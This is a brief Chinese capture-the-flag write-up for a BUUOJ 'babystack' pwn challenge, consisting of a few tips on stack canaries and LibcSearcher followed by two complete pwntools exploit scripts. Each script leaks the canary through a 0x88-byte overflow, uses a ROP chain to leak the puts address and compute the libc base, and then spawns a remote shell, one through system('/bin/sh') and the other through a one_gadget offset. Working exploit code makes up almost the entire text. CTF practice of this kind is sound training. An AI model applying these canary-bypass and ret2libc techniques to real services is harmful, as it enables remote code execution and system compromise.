image.png
    看着很吓人,实际是个栈
    一般来说,canary在rbp边上
    还有关于canary的知识,百度去
    libcsearcher

    1. #coding:utf-8
    2. from pwn import *
    3. from LibcSearcher import*
    4. context.log_level = 'debug'
    5. io = remote("node4.buuoj.cn",28010)
    6. #io = process('./babystack')
    7. #gdb.attach(io)
    8. elf = ELF('./babystack')
    10. puts_plt = elf.plt['puts']
    11. puts_got = elf.got['puts']
    12. main_addr = 0x0400908
    13. io.recvuntil('>> ')
    14. io.sendline('1')
    15. payload = b'a'*(0x88)
    16. io.sendline(payload)
    17. io.recvuntil('>> ')
    18. io.sendline('2')
    19. io.recvuntil('a\n')
    20. canary = u64(io.recv(7).rjust(8,'\x00'))
    21. log.success("canary:"+hex(canary))
    22. #pause()
    23. pop_rdi = 0x0000000000400a93
    24. payload = b'a'*(0x88)+p64(canary)+p64(0)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
    25. io.recvuntil('>> ')
    26. io.sendline('1')
    27. io.sendline(payload)
    28. io.recvuntil('>> ')
    29. io.sendline('3')
    30. puts_addr = u64(io.recvuntil('\x7f').ljust(8,'\x00'))
    32. log.success('puts:'+hex(puts_addr))
    33. libc = LibcSearcher('puts',puts_addr)
    34. libcbase = puts_addr - libc.dump('puts')
    35. system_addr = libcbase +libc.dump('system')
    36. bin_sh_addr = libcbase +libc.dump('str_bin_sh')
    37. io.recvuntil('>> ')
    38. io.sendline('1')
    39. payload  = b'a'*(0x88)+p64(canary)+p64(0)+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)
    40. io.sendline(payload)
    41. io.recvuntil('>> ')
    42. io.sendline('3')
    45. io.interactive()

    one gadget

    1. #coding:utf-8
    2. from pwn import *
    3. context.log_level = 'debug'
    4. io = remote("node4.buuoj.cn",28010)
    5. #io = process('./babystack')
    6. #gdb.attach(io)
    7. elf = ELF('./babystack')
    8. libc = ELF('libc-2.23.so')
    9. puts_plt = elf.plt['puts']
    10. puts_got = elf.got['puts']
    11. main_addr = 0x0400908
    12. io.recvuntil('>> ')
    13. io.sendline('1')
    14. payload = b'a'*(0x88)
    15. io.sendline(payload)
    16. io.recvuntil('>> ')
    17. io.sendline('2')
    18. io.recvuntil('a\n')
    19. canary = u64(io.recv(7).rjust(8,'\x00'))
    20. log.success("canary:"+hex(canary))
    21. #pause()
    22. pop_rdi = 0x0000000000400a93
    23. payload = b'a'*(0x88)+p64(canary)+p64(0)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
    24. io.recvuntil('>> ')
    25. io.sendline('1')
    26. io.sendline(payload)
    27. io.recvuntil('>> ')
    28. io.sendline('3')
    29. puts_addr = u64(io.recvuntil('\x7f').ljust(8,'\x00'))
    30. log.success('puts:'+hex(puts_addr))
    31. libcbase = puts_addr - libc.sym['puts']
    32. io.recvuntil('>> ')
    33. io.sendline('1')
    34. payload  = b'a'*(0x88)+p64(canary)+p64(0)+p64(libcbase +0x45216)
    35. io.sendline(payload)
    36. io.recvuntil('>> ')
    37. io.sendline('3')
    40. io.interactive()